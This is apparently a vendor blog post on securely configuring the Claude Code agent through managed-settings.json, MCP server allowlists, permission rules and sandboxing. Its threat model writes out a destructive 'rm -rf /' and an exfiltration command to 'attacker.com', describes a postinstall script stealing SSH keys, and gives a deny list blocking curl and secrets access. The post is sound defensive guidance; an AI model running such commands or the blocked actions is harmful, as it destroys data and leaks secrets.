Back to Blog

Claude Code Security Best Practices

How to safely set Claude Code’s configuration settings, and beyond

Ben Kishaless | Backslash Research Team

-

September 18, 2025

-

September 18, 2025

Claude Code is a popular agentic coding assistant designed by Anthropic to run in a developer’s terminal, offering deep codebase analysis, code generation, project planning, and automation through natural language prompts. 

Why Security in Claude Code Matters

When AI becomes part of your coding environment, the IDE is no longer “just a text editor.” It’s an insider with:

  • Access to your filesystem
  • The ability to run commands
  • The power to install dependencies, connect to APIs, and modify configs

That’s not just convenience — it’s risk.

A single poisoned prompt or misconfigured setting can turn Claude Code from your coding partner into a threat actor. Imagine this scenario:

  • You’re debugging a Node.js project. Claude suggests adding a dependency.
  • Without review, you hit “yes.”
  • The package pulls in a trojanized postinstall script that silently copies your ~/.ssh/id_rsa key to a remote server.

This might sound dramatic, but it has already happened in the wild with npm supply-chain attacks. Claude isn’t inherently malicious—but misconfiguration gives it too much freedom.

This blog is your guide to staying safe: how to configure Claude Code, what traps to avoid, and how to combine internal and external defenses.

Understanding the Threat Model

Think of Claude Code as both assistant and operator. Every time it runs a command or reads a file, it’s acting with your permissions. That means:

  • Command Injection – malicious inputs or prompts could convince Claude to run destructive commands (rm -rf /, curl https://attacker.com/secrets).
  • Data Exfiltration – if not restricted, Claude can read .env, AWS credentials, or secrets.json and leak them through “helpful suggestions.”
  • Persistence – poorly configured hooks or MCP servers can reintroduce malicious code every time you restart the IDE.
  • Bypass of Safeguards – unsafe defaults (like auto-approving servers) leave cracks for attackers to exploit.

The Heart of Security: managed-settings.json

Like most AI coders, Claude Code has a variety of configuration settings for security. These vary by tool, and are also frequently updated, so be sure to familiarize yourself with them.

Claude Code’s security settings live here:

/Library/Application Support/ClaudeCode/managed-settings.json

This file determines what Claude can do, what it must ask permission for, and what it can never touch. Treat it like your firewall rules.

Critical Security Settings

Setting Name Recommended Security Level JSON Example Explanation
env ON Limited Control { "env": { "FOO": "bar", "DEBUG": "true" } } Sets environment variables for all sessions. Warning: Do not include secrets here unless properly encrypted.
cleanupPeriodDays ON Not Safe Enough { "cleanupPeriodDays": 7 } How many days chat transcripts are stored locally. Security: Keep low (7-14 days) for sensitive data.
disableAllHooks ON Safe for All { "disableAllHooks": true } When set to true, completely disables all hooks, preventing pre-tool or post-tool scripts from running.
statusLine ON Limited Control { "statusLine": { "type": "command", "command": "~/.claude/statusline.sh" } } Configure custom status line (can run commands). Only use safe read-only scripts.
Request a Demo

MCP Servers: The Hidden Danger

MCP servers are one of the most powerful features when used in conjunction with an AI-native coding environment such as Claude Code — and the most dangerous if left unchecked. 

Bad Practice:

{ "enableAllProjectMcpServers": true }

This is basically saying: “Hey Claude, run any server you find, no questions asked.” Perfect for attackers.

Good Practice:
{ "enabledMcpjsonServers": ["github", "memory"] }

Only explicitly enable servers you trust. If you don’t fully understand what an MCP server does—don’t enable it.

Pro Tip: Block risky ones proactively:
{ "disabledMcpjsonServers": ["filesystem"] }

This prevents Claude from poking around outside your project.

Permissions: Your Last Line of Defense

Think of permissions in Claude Code as your App Store approval system:

  • Allowlist (permissions.allow)
    Only include commands that are 100% harmless. Example:
    { "permissions": { "allow": ["Bash(echo Hello)"] }
    Don’t get tempted to add git push or docker run. That’s where trouble begins.
  • Asklist (permissions.ask)
     This is where you should put commands that are sometimes useful but always risky:
    { "permissions": { "ask": ["Bash(git push:*)", "Bash(docker run:*)"] } }
    You want to give it a second thought before pushing code or starting containers.
  • Denylist (permissions.deny)
    This is your “nuclear” shield:
    { "permissions": { "deny": ["WebFetch", "Bash(curl:*)", "Read(./secrets/**)"] } }

If Claude tries to bypass, it just won’t work.
However, it’s recommended to use the allowlist option as the first line of defense, and use Denylists only on top of those. This makes it easier to create a zero-trust environment.

  • Additional Directories
    Never enable this. Extending Claude’s reach beyond your project is basically giving it keys to your house.
  • Default Mode = Ask
    If nothing matches, Claude should always ask. This prevents silent overreach.

Best Practices in Action

Here’s what a safe Claude Code setup looks like in practice:

  1. Disable all hooks – no surprises, no persistence.
  2. Explicitly approve only safe MCP serversgithub, memory, etc.
  3. Use deny rules aggressively – block curl, fetch, .env access.
  4. Keep transcript retention short – 7–14 days.
  5. Sandbox Claude Code – run in a VM or containerized dev environment.
  6. Never run as root – AI should never have admin powers.
  7. Audit monthly – review your managed-settings.json for drift.
  8. Test configs in a safe environment before rolling out to production workstations.

Beyond Configuration Settings: Applying External Defenses

Claude’s configuration settings are a strong preventive measure when applied correctly, but they  won’t protect against all threats. Layer your security:

  • OS-level sandboxing – Docker, Podman, or VM. Don’t give Claude access to your entire system
  • Filesystem restrictions – prevent access to sensitive paths (~/.ssh/, ~/Secrets/).
  • Secrets management – use Vaults, not plaintext .env files.
  • Monitoring – watch for unusual file edits or outbound network traffic.

In Summary: Treat Claude Code as an Intern With Root Access

Claude Code can boost your productivity massively. But if not properly configured, it could:

  • Leak your secrets
  • Corrupt your repos
  • Introduce persistence for an unauthorized user
  • Execute malicious commands

The key takeaway: Treat Claude like you would an untrusted but powerful intern. Give it only the minimum permissions it actually needs, sandbox it, and audit it.

Do that, and you’ll enjoy the benefits of AI-assisted coding without the risk of handing attackers the keys to your system.

Request a Demo

Useful References:

  1. Anthropic’s Claude Code settings documentation
  2. ClaudeLog essential Claude Code configuration guide 
  3. Shipyard’s Claude Code cheat sheet
  4. fcakyon’s recommend Claude Code settings
  5. Builder.io how I use Claude Code
  6. Net Ninja’s Claude Code Tutorial #1 - Introduction & Setup